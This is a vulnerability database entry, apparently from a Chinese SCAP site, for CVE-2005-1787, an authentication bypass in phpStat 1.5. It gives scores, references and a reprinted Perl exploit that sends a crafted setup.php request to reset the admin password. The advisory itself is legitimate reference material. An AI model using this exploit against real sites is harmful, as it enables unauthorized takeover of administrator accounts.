CVE-2005-1787
CVSS7.5
发布时间 :2005-05-27 00:00:00
修订时间 :2016-11-25 13:27:03
NMCOE    

[原文]setup.php in phpStat 1.5 allows remote attackers to bypass authentication and gain administrator privileges by setting the $check variable.


[CNNVD]phpStat漏洞(CNNVD-200505-1216)

        phpStat 1.5中的setup.phh允许远程攻击者通过设置$check变量来绕过认证并获取管理员权限。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CWE (弱点类目)

CWE-20 [输入验证不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1787
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1787
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1216
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111721290726958&w=2
(UNKNOWN)  BUGTRAQ  20050527 PHP Stat Administrative User Authentication Bypass
http://securitytracker.com/id?1014064
(VENDOR_ADVISORY)  SECTRACK  1014064
http://www.soulblack.com.ar/repo/papers/advisory/PhpStat_advisory.txt
(UNKNOWN)  MISC  http://www.soulblack.com.ar/repo/papers/advisory/PhpStat_advisory.txt
http://www.soulblack.com.ar/repo/tools/sbphpstatpoc.txt
(VENDOR_ADVISORY)  MISC  http://www.soulblack.com.ar/repo/tools/sbphpstatpoc.txt

- 漏洞信息

phpStat漏洞
高危 未知
2005-05-27 00:00:00 2005-10-20 00:00:00
远程  
        phpStat 1.5中的setup.phh允许远程攻击者通过设置$check变量来绕过认证并获取管理员权限。

- 公告与补丁

        

- 漏洞信息 (1016)

phpStat <= 1.5 (setup.php) Authentication Bypass Exploit (perl) (EDBID:1016)
php webapps
2005-05-30 Verified
0 Alpha_Programmer
N/A [点击下载]
#!/usr/bin/perl
#####################################################################
#T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m
#####################################################################
# EXPLOIT FOR - PHPStat Setup.PHP Authentication Bypass Vulnerability
#
#Exploit By :  A l p h a _ P r o g r a m m e r ( Sirus-v )
#E-Mail : Alpha_Programmer@Yahoo.com
#
#This Xpl Change Admin's Pass in This Portal !!
#Discovered by: SoulBlack
#
#Vulnerable Version : phpStat 1.5
#
#####################################################################
# Gr33tz To ==>   mh_p0rtal , Oil_karchack , Str0ke  &  AlphaST.Com
#
# So Iranian Hacking & Security Teams :
#
# Crouz , Shabgard , Simorgh-ev ,IHS , Emperor & GrayHatz.NeT
#####################################################################


use IO::Socket;

if (@ARGV < 3)
{
 print "\n==========================================\n";
 print " \n     -- Exploit By Alpha Programmer --\n\n";
 print "     Trap-Set UnderGrounD Hacking Team      \n\n";
 print "         Usage: <T4rg3t> <DIR> <Password>\n\n";
 print "==========================================\n\n";
 print "Examples:\n\n";
 print "    phpStat.pl www.Site.com /phpstat/ 12345\n";
 exit();
}

my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "C4nn0t C0nn3ct to $host" }

print "C0nn3cted\n";

$http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n";
$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";
$http .= "Host: $host\n\n\n\n";

print "[+]Sending H3ll Packet ...\n";
print $remote $http;
sleep(1);
print "[+]Wait For Authentication Bypass ...\n";
sleep(100);
while (<$remote>)
{
}
print "[+]OK ! Now Goto $host$ARGV[1]setup.php And L0gin Whith:\n\n";
print "[+]User: admin\n";
print "[+]Pass: $ARGV[2]";

# milw0rm.com [2005-05-30]
		

- 漏洞信息

16868
phpStat setup.php check Variable Authentication Bypass
Remote / Network Access Authentication Management
Loss of Integrity
Exploit Public

- 漏洞描述

phpStat contains a flaw that may allow a remote attacker to bypass authentication settings. The issue is triggered due to an error in the authentication process in 'setup.php'. With a specially crafted request to the 'check' variable, a remote attacker can gain access to administrative privileges resulting in a loss of integrity.

- 时间线

2005-05-25 Unknow
2005-05-25 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站